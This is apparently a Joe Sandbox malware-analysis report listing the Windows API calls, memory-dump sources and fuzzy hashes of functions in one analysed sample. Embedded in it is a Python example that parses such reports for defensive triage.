                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DC09
                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0056DC2F
                                                                      • SysAllocString.OLEAUT32(00000000), ref: 0056DC32
                                                                      • SysAllocString.OLEAUT32 ref: 0056DC53
                                                                      • SysFreeString.OLEAUT32 ref: 0056DC5C
                                                                      • StringFromGUID2.OLE32(?,?,00000028), ref: 0056DC76
                                                                      • SysAllocString.OLEAUT32(?), ref: 0056DC84
                                                                      Similarity
                                                                      • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                      • String ID:
                                                                      • API String ID: 3761583154-0
                                                                      APIs
                                                                        • Part of subcall function 00511D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00511D73
                                                                        • Part of subcall function 00511D35: GetStockObject.GDI32(00000011), ref: 00511D87
                                                                        • Part of subcall function 00511D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00511D91
                                                                      • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00597632
                                                                      • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0059763F
                                                                      • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0059764A
                                                                      • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00597659
                                                                      • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00597665
                                                                      Similarity
                                                                      • API ID: MessageSend$CreateObjectStockWindow
                                                                      • String ID: Msctls_Progress32
                                                                      • API String ID: 1025951953-3636473452
                                                                      APIs
                                                                      • __init_pointers.LIBCMT ref: 00539AE6
                                                                        • Part of subcall function 00533187: EncodePointer.KERNEL32(00000000), ref: 0053318A
                                                                        • Part of subcall function 00533187: __initp_misc_winsig.LIBCMT ref: 005331A5
                                                                        • Part of subcall function 00533187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00539EA0
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00539EB4
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00539EC7
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00539EDA
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00539EED
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00539F00
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00539F13
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00539F26
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00539F39
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00539F4C
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00539F5F
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00539F72
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00539F85
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00539F98
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00539FAB
                                                                        • Part of subcall function 00533187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00539FBE
                                                                      • __mtinitlocks.LIBCMT ref: 00539AEB
                                                                      • __mtterm.LIBCMT ref: 00539AF4
                                                                        • Part of subcall function 00539B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00539AF9,00537CD0,005CA0B8,00000014), ref: 00539C56
                                                                        • Part of subcall function 00539B5C: _free.LIBCMT ref: 00539C5D
                                                                        • Part of subcall function 00539B5C: DeleteCriticalSection.KERNEL32(02],?,?,00539AF9,00537CD0,005CA0B8,00000014), ref: 00539C7F
                                                                      • __calloc_crt.LIBCMT ref: 00539B19
                                                                      • __initptd.LIBCMT ref: 00539B3B
                                                                      • GetCurrentThreadId.KERNEL32 ref: 00539B42
                                                                      Similarity
                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                      • String ID:
                                                                      • API String ID: 3567560977-0
                                                                      • Opcode ID: 57c61c3caded9268a48f30436503899ac23882a99ad1a5924706c8ad38160760
                                                                      • Instruction ID: 89c74605c0cddcefae9efa23ee6230231c50acd4805913136bd5e18aefdf30d2
                                                                      • Opcode Fuzzy Hash: 57c61c3caded9268a48f30436503899ac23882a99ad1a5924706c8ad38160760
                                                                      • Instruction Fuzzy Hash: D7F090B260D7135AE7347774BC0BA8A6F90FF82730F200A1AF460D60D2EFE0844141A0
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0059B644
                                                                      • _memset.LIBCMT ref: 0059B653
                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D6F20,005D6F64), ref: 0059B682
                                                                      • CloseHandle.KERNEL32 ref: 0059B694
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memset$CloseCreateHandleProcess
                                                                      • String ID: o]$do]
                                                                      • API String ID: 3277943733-4240527779
                                                                      • Opcode ID: e1d2d6d9e1f023bd82c980bf544c91ca192ec72f1a3076adb48162a773b11347
                                                                      • Instruction ID: 520667360645897143c103e3bea97dac28cf2e45c7bcc0d61200b9a5f546fc6d
                                                                      • Opcode Fuzzy Hash: e1d2d6d9e1f023bd82c980bf544c91ca192ec72f1a3076adb48162a773b11347
                                                                      • Instruction Fuzzy Hash: CCF03AB26417067AE3202765BC4AFBB3F9CEB18395F004423FA08E6196D775580697A8
                                                                      APIs
                                                                      • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00533F85), ref: 00534085
                                                                      • GetProcAddress.KERNEL32(00000000), ref: 0053408C
                                                                      • EncodePointer.KERNEL32(00000000), ref: 00534097
                                                                      • DecodePointer.KERNEL32(00533F85), ref: 005340B2
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                      • String ID: RoUninitialize$combase.dll
                                                                      • API String ID: 3489934621-2819208100
                                                                      • Opcode ID: c567495195a11dd4a3fcef49aad7124c14644f38316caa25d0ec199d09a24012
                                                                      • Instruction ID: edeb9765f8edac917fa086a50db6f18db98d6b3ed5721e0277fab62250bf127f
                                                                      • Opcode Fuzzy Hash: c567495195a11dd4a3fcef49aad7124c14644f38316caa25d0ec199d09a24012
                                                                      • Instruction Fuzzy Hash: 89E09270686302ABEB20AFA5EC0EB053FA4B724742F114427F101F50A0CBB6960CEB16
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: _memmove$__itow__swprintf
                                                                      • String ID:
                                                                      • API String ID: 3253778849-0
                                                                      • Opcode ID: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                      • Instruction ID: f06afcc74be2fd578575b9c8ace388cba5f398282952bbcd4270a7a60b07d8a9
                                                                      • Opcode Fuzzy Hash: 9d80155e7f2a53e1e73f8c24d63cc00193ec6995be1ce472b138d7b8ebbb779b
                                                                      • Instruction Fuzzy Hash: 0A619B3090065BABDF01EF64C899EFE3FA9BF84308F448918F8195B192DB34E945EB50
                                                                      APIs
                                                                        • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
                                                                        • Part of subcall function 00590E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0058FDAD,?,?), ref: 00590E31
                                                                      • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005902BD
                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005902FD
                                                                      • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00590320
                                                                      • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00590349
                                                                      • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0059038C
                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00590399
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                      • String ID:
                                                                      • API String ID: 4046560759-0
                                                                      • Opcode ID: 4963377ea487f724c705fce5ea5055cb666fbdb5b080f6013283d39d89e877af
                                                                      • Instruction ID: b0c8bca3b7d83f6e0a8eeb53c2c5c38dbb345790ee63b1406f03e2603accb76d
                                                                      • Opcode Fuzzy Hash: 4963377ea487f724c705fce5ea5055cb666fbdb5b080f6013283d39d89e877af
                                                                      • Instruction Fuzzy Hash: 42513931208205AFDB14EF64C889EAEBBE9FF88314F044D1DF455872A2DB31E945DB52
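The CreateProcessW entry and the registry-enumeration entry above share the layout every function summary in this report uses: an APIs list (call, module, argument snapshot, call-site address, with callee-attributed lines marked "Part of subcall function"), the memory-dump provenance, and a Similarity block carrying API/String IDs and fuzzy hashes. The following Python is an added example, not part of the Joe Sandbox report or its tooling: it parses text copied from these blocks into records, so an analyst can list every call site of a given API, decode the dwCreationFlags argument of CreateProcessW (the 00000020 in the entry above is NORMAL_PRIORITY_CLASS; CREATE_SUSPENDED is the value to look for when hollowing is suspected), tag entries by API set, and index entries by Instruction Fuzzy Hash. The section names and bullet format are taken from this page; the triage tags and the embedded sample text (a trimmed copy of the two entries above) are the example's own constructions.

```python
"""Parse the per-function summaries of a Joe Sandbox report (the 'APIs', 'Memory Dump
Source' and 'Similarity' blocks above) into filterable records. Added example."""
import re
from dataclasses import dataclass, field

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
# "• CreateProcessW.KERNEL32(00000000,?,...), ref: 0059B682", "• CloseHandle.KERNEL32 ref: ..." and
# "• Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22" (after whitespace is stripped)
API_RE = re.compile(r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
                    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
                    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
KV_RE = re.compile(r"^•\s*(?P<key>[^:]+?):\s*(?P<value>.*)$")  # "• Opcode ID: ..."; value may be empty
# dwCreationFlags bits (6th CreateProcess argument); the values are the Win32 header constants.
CREATION_FLAGS = {0x4: "CREATE_SUSPENDED", 0x8: "DETACHED_PROCESS", 0x10: "CREATE_NEW_CONSOLE",
                  0x20: "NORMAL_PRIORITY_CLASS", 0x80000: "EXTENDED_STARTUPINFO_PRESENT", 0x8000000: "CREATE_NO_WINDOW"}
# Triage tags: these groupings are the example's own, not a Joe Sandbox signature.
TAGS = {"process-creation": {"CreateProcessW", "CreateProcessA"},
        "registry-enumeration": {"RegEnumValueW", "RegEnumKeyExW"},
        "input-injection": {"mouse_event", "keybd_event", "SendInput"}}

@dataclass
class ApiCall:
    name: str
    module: str
    args: str          # argument snapshot as printed; "?" marks an unresolved value
    ref: str           # call-site address
    subcall: str = ""  # callee address when listed as "Part of subcall function"

@dataclass
class FunctionSummary:
    apis: list = field(default_factory=list)
    fields: dict = field(default_factory=dict)  # e.g. "Opcode ID" -> [...], "Associated" -> [...]
    def api_names(self):
        return {c.name for c in self.apis}

def parse_report(text):
    """One FunctionSummary per 'APIs' heading; bullet lines belong to the open entry."""
    entries, cur, section = [], None, None
    for line in (l.strip() for l in text.splitlines()):
        if line in SECTIONS:
            if line == "APIs":
                cur = FunctionSummary()
                entries.append(cur)
            section = line
            continue
        if not line or cur is None:
            continue
        m = API_RE.match(line) if section == "APIs" else None
        if m:
            cur.apis.append(ApiCall(m["name"], m["module"], m["args"] or "", m["ref"], m["sub"] or ""))
            continue
        m = KV_RE.match(line)
        if m:
            value = m["value"].strip()
            if value.endswith("Download File"):  # link label fused to the dump name when copied from the page
                value = value[:-len("Download File")].strip()
            cur.fields.setdefault(m["key"], []).append(value)
    return entries

def find_calls(entries, api_name):
    return [(c.ref, c.args) for e in entries for c in e.apis if c.name == api_name]  # (ref, args)

def decode_creation_flags(args):
    """Names of the bits set in a CreateProcess dwCreationFlags snapshot, or None if unresolved."""
    parts = args.split(",")
    if len(parts) < 6 or not re.fullmatch(r"[0-9A-Fa-f]+", parts[5]):
        return None
    flags = int(parts[5], 16)
    return [name for bit, name in sorted(CREATION_FLAGS.items()) if flags & bit]

def tag_entry(entry):
    names = entry.api_names()
    return sorted(tag for tag, apis in TAGS.items() if names & apis)

def instruction_hash_index(entries):
    """Instruction Fuzzy Hash -> Opcode IDs (exact matches only), for cross-sample comparison."""
    idx = {}
    for e in entries:
        for h in e.fields.get("Instruction Fuzzy Hash", []):
            idx.setdefault(h, []).extend(e.fields.get("Opcode ID", []))
    return idx

# Constructed sample: a trimmed copy of the CreateProcessW and registry entries in this report.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 0059B644
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,005D6F20,005D6F64), ref: 0059B682
Memory Dump Source
• Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
Similarity
• String ID: o]$do]
• Opcode ID: e1d2d6d9e1f023bd82c980bf544c91ca192ec72f1a3076adb48162a773b11347
• Instruction Fuzzy Hash: CCF03AB26417067AE3202765BC4AFBB3F9CEB18395F004423FA08E6196D775580697A8
APIs
  • Part of subcall function 00517DE1: _memmove.LIBCMT ref: 00517E22
• RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00590349
Similarity
• String ID:
• Instruction Fuzzy Hash: 42513931208205AFDB14EF64C889EAEBBE9FF88314F044D1DF455872A2DB31E945DB52
"""
```

Feed a larger portion of the report into `parse_report` (from a file or the clipboard) and run `find_calls` / `decode_creation_flags` over the result; a CreateProcessW call whose flags decode to CREATE_SUSPENDED, or an entry whose Instruction Fuzzy Hash recurs in another sample's report, is the function to open first in the disassembler. The hash index only matches identical strings; Joe Sandbox's fuzzy hashes are meant for approximate comparison, which this example does not attempt.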
                                                                      APIs
                                                                      • GetMenu.USER32(?), ref: 005957FB
                                                                      • GetMenuItemCount.USER32(00000000), ref: 00595832
                                                                      • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0059585A
                                                                      • GetMenuItemID.USER32(?,?), ref: 005958C9
                                                                      • GetSubMenu.USER32(?,?), ref: 005958D7
                                                                      • PostMessageW.USER32(?,00000111,?,00000000), ref: 00595928
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountMessagePostString
                                                                      • String ID:
                                                                      • API String ID: 650687236-0
                                                                      • Opcode ID: f43244fec2e5910127dea58ac69d26c5feaf9927bbc3aefffd15eee11146b3d9
                                                                      • Instruction ID: 6b1b2e39fb3853b957b7f5677e8a984904c48c37f139cc98f029fb580c5e054e
                                                                      • Opcode Fuzzy Hash: f43244fec2e5910127dea58ac69d26c5feaf9927bbc3aefffd15eee11146b3d9
                                                                      • Instruction Fuzzy Hash: 19515B35E00616AFDF12EF64C855AAEBBB4FF48320F114469E806AB351DB70AE51DB90
                                                                      APIs
                                                                      • VariantInit.OLEAUT32(?), ref: 0056EF06
                                                                      • VariantClear.OLEAUT32(00000013), ref: 0056EF78
                                                                      • VariantClear.OLEAUT32(00000000), ref: 0056EFD3
                                                                      • _memmove.LIBCMT ref: 0056EFFD
                                                                      • VariantClear.OLEAUT32(?), ref: 0056F04A
                                                                      • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0056F078
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$Clear$ChangeInitType_memmove
                                                                      • String ID:
                                                                      • API String ID: 1101466143-0
                                                                      • Opcode ID: e803c10878292ec9506e5bcb04188ffaa73757082b635834928eeee19ea91aa7
                                                                      • Instruction ID: a489350c3e9bff4cc187ad28471695a2185a243ad5feb6bf2aec96e0e5f530ca
                                                                      • Opcode Fuzzy Hash: e803c10878292ec9506e5bcb04188ffaa73757082b635834928eeee19ea91aa7
                                                                      • Instruction Fuzzy Hash: C7514D75A00209DFDB14CF58D884AAABBB8FF4C314B15856AE959DB305E335E911CB90
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00572258
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 005722A3
                                                                      • IsMenu.USER32(00000000), ref: 005722C3
                                                                      • CreatePopupMenu.USER32 ref: 005722F7
                                                                      • GetMenuItemCount.USER32(000000FF), ref: 00572355
                                                                      • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00572386
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                      • String ID:
                                                                      • API String ID: 3311875123-0
                                                                      • Opcode ID: 4580f0bbb0922b0b18e99f7525f4b29ebe97106d4ce2e3d76a7078dcd810d85f
                                                                      • Instruction ID: b60e83cbf103abc2439b3ced570b009aabe8e66e79c2f19f201cdeef5e0a3ecb
                                                                      • Opcode Fuzzy Hash: 4580f0bbb0922b0b18e99f7525f4b29ebe97106d4ce2e3d76a7078dcd810d85f
                                                                      • Instruction Fuzzy Hash: 2B51C03060024ADFDF21CF68E888BADBFF5FF45318F108A2AE85997291D3748904EB51
                                                                      APIs
                                                                        • Part of subcall function 00512612: GetWindowLongW.USER32(?,000000EB), ref: 00512623
                                                                      • BeginPaint.USER32(?,?,?,?,?,?), ref: 0051179A
                                                                      • GetWindowRect.USER32(?,?), ref: 005117FE
                                                                      • ScreenToClient.USER32(?,?), ref: 0051181B
                                                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0051182C
                                                                      • EndPaint.USER32(?,?), ref: 00511876
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: PaintWindow$BeginClientLongRectScreenViewport
                                                                      • String ID:
                                                                      • API String ID: 1827037458-0
                                                                      • Opcode ID: acc5988b004936671ed83a0b4b61dc7366e77a7f8c54d8565952b50f82055cc5
                                                                      • Instruction ID: 6f6bea6dc77051fe33fcb5815cb96df63bc7f0bb4652e9946892a083a3671808
                                                                      • Opcode Fuzzy Hash: acc5988b004936671ed83a0b4b61dc7366e77a7f8c54d8565952b50f82055cc5
                                                                      • Instruction Fuzzy Hash: 9041A070104701AFE720DF24CC84FAA7FE8FB55724F14466AF6A4CA2A1D7309889EB65
                                                                      APIs
                                                                      • ShowWindow.USER32(005D57B0,00000000,01004C58,?,?,005D57B0,?,0059B5A8,?,?), ref: 0059B712
                                                                      • EnableWindow.USER32(00000000,00000000), ref: 0059B736
                                                                      • ShowWindow.USER32(005D57B0,00000000,01004C58,?,?,005D57B0,?,0059B5A8,?,?), ref: 0059B796
                                                                      • ShowWindow.USER32(00000000,00000004,?,0059B5A8,?,?), ref: 0059B7A8
                                                                      • EnableWindow.USER32(00000000,00000001), ref: 0059B7CC
                                                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0059B7EF
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Show$Enable$MessageSend
                                                                      • String ID:
                                                                      • API String ID: 642888154-0
                                                                      • Opcode ID: e7966a510e52e142f28a29be68ada721fb33f829fef1e5ee13514ee38bb9d557
                                                                      • Instruction ID: 649e2d14a4c789eaceed05ab54d3de5c8b5507d3461f5f64b0c39f454204273c
                                                                      • Opcode Fuzzy Hash: e7966a510e52e142f28a29be68ada721fb33f829fef1e5ee13514ee38bb9d557
                                                                      • Instruction Fuzzy Hash: D2416234600240AFFF25CFA4E699B947FE1FF85310F1842B9E9498F6A2C731A856CB51
                                                                      APIs
                                                                      • GetForegroundWindow.USER32(?,?,?,?,?,?,00584E41,?,?,00000000,00000001), ref: 005870AC
                                                                        • Part of subcall function 005839A0: GetWindowRect.USER32(?,?), ref: 005839B3
                                                                      • GetDesktopWindow.USER32 ref: 005870D6
                                                                      • GetWindowRect.USER32(00000000), ref: 005870DD
                                                                      • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0058710F
                                                                        • Part of subcall function 00575244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 005752BC
                                                                      • GetCursorPos.USER32(?), ref: 0058713B
                                                                      • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00587199
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                       • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmp
                                                                       • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                      • String ID:
                                                                      • API String ID: 4137160315-0
                                                                      • Opcode ID: 8baa860646c638b30dfbeaf669672db80c25f0dfacc2cb9a521b518345e5dd65
                                                                      • Instruction ID: 9c1c0b30c74d0b2867c67ba52a0e047fc8f3a613152eacb7cb5668d63fe76825
                                                                      • Opcode Fuzzy Hash: 8baa860646c638b30dfbeaf669672db80c25f0dfacc2cb9a521b518345e5dd65
                                                                      • Instruction Fuzzy Hash: F131B47250530AABD720EF14D849B5BBBA9FF88314F10091AF989E7191D674EA09CB92
APIs
  • Part of subcall function 005680A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005680C0
  • Part of subcall function 005680A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005680CA
  • Part of subcall function 005680A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005680D9
  • Part of subcall function 005680A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005680E0
